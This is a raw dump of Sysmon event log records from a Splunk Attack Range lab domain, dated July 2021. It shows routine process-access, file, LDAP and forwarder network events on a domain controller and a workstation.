07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.383{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046874Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.382{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:08.350{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F61B5A362EEE39D9FDD7F2483ACA6F49,SHA256=2355CBD9300B4BBDBD4FF1B57493B38812AC2A74D539DA915FDFB0F5C3B292A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:09.929{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86B99A2FD8FDE60C58FF7CC88B45F025,SHA256=637CB51224FDD874248855916AAA630B851252E7014C8B5EE96BAD8A0DE665F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:09.664{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A1566DB21CD5B39249FC5F7546A729D,SHA256=FC7D635BCAE5FD53BE7216C77D26BCB213A3D74A522128C14744BA5E9A2387F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:10.929{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=798E7A6227FC066F66C297CB26592AD4,SHA256=9CE08CA258A371C509F36C05D8F6B79BD87130904DCD5B1061094E337F8AE8F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:10.681{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F535AD7117B2200B7DDA7ED3B7F200F,SHA256=52728BE1C6A5CB60F632B34AFB39FDD478E320976D3BAC44E689BEE0AA534D4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:11.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3B7BEC64779DAF5394F448C6D22864A,SHA256=AD6EDD8E18B3D7E6622037FDA98146A06E6936C58588ED45E9DA85E57FEF6CC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:11.944{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=209230ACE31B63B292D19855B0E8F061,SHA256=F87BD37C2A1DD66E1B10B2FE23F572432432C9E281F8DA2638E28AA029C5FB57,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:10.296{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57198-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001046955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:04.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50950-false10.0.1.12-8000- 23542300x80000000000000001046954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:12.731{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0DAF694A764391F1D6DED69B88C1325,SHA256=963B4E0557DFBF7DEBF244906B1832A83CBC5E60995FAA49108A8D5F5A51E061,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:12.976{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ED0AC3EF48A9429704179658FA547AB,SHA256=64DC3533F2701138E6C38F1D0A6859AE3336F3B16C15B3151DCE35C090E04006,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:13.746{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D01C279BE35E359EB01DAAE2A6D5A2B,SHA256=8D3BF21ED9EA98EF0C402B78E453CD2AC49ABF66215DD8A3E6106108302212F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:14.746{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19A5A8A98E28D6376F02497042288844,SHA256=727A6404F615996608F92F36D0EBD0E71EFE7788CAE3A5001F9D326A7F15B0B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:14.003{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9422EA7388B13A4089F15008A7493AA9,SHA256=DAB62DC16E53ED461D15CB4081046F0CA8F2A286619AEC64ABB86C74811394FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.760{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7CE78EDB3138D352982A95F097AE1B6,SHA256=EC342B2CD55B0B062FDF8140B60CA2044E033953890DDDBC5A1F27C9EB10115F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:15.065{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D2B456C2E7024052A08164A783D77C,SHA256=C902BF6EFC23D9E726CBFEE0AABA4B39EC70B749B624DFD890837C6552BA5D81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A6B014ED0940D12E251C3B2E5AB5ED56,SHA256=BC0C0AE815C90B3E5DDBE7118A4C0C534E23D9DA5017381283B3B45CE2C910CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:15.380{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BDDC3F6BD66C30EE5927573F5C70117,SHA256=E68CA0B79A32927F5B7CD576BC7205E1D015333B649430FE06B129AE0E026FDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:16.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB25627026FAAF1DA6F4CD8C83F976A2,SHA256=E29FC647E16F0B523E1F5BB21E8A43560C9F746D54B394DC0C9985F69E9CBD6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:16.097{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6214174F927FCF32EE668243A487ABA5,SHA256=5B0509AEA0C154C74CB62F88B75653A129EA188470C04ABE43D926771EDD2222,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.913{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50951-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001046961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:07.913{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50951-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001046964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:17.796{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CDDFFD7B902C55B8D562AB08B651F3E,SHA256=738F261F853E356816BC88DBF6FF2E69D2904D970E48A5C7B6686AB8AFA332F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:16.245{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57199-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:17.144{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09F73D4ABAA91317EBA76888BD465AB1,SHA256=FF0F2EAB3A880C07406327F7CAA10F351D269ABA67F199EA0B39EBD3C66C64EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:18.810{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF761FD5FF0867752A700BF07F2FD2DD,SHA256=03C03B762BA9946D110833C723D130731C32824EA222B1A9C071A02FEDA2ABD7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:18.206{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48CEFACA22796327A54B8CC005A13466,SHA256=394C2242DA9C3574ACB65B3AB6DFFD882634F5B0082ECE2064344CCE35A3A9E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:18.211{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:09.765{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50952-false10.0.1.12-8000- 23542300x80000000000000001046968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:19.825{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 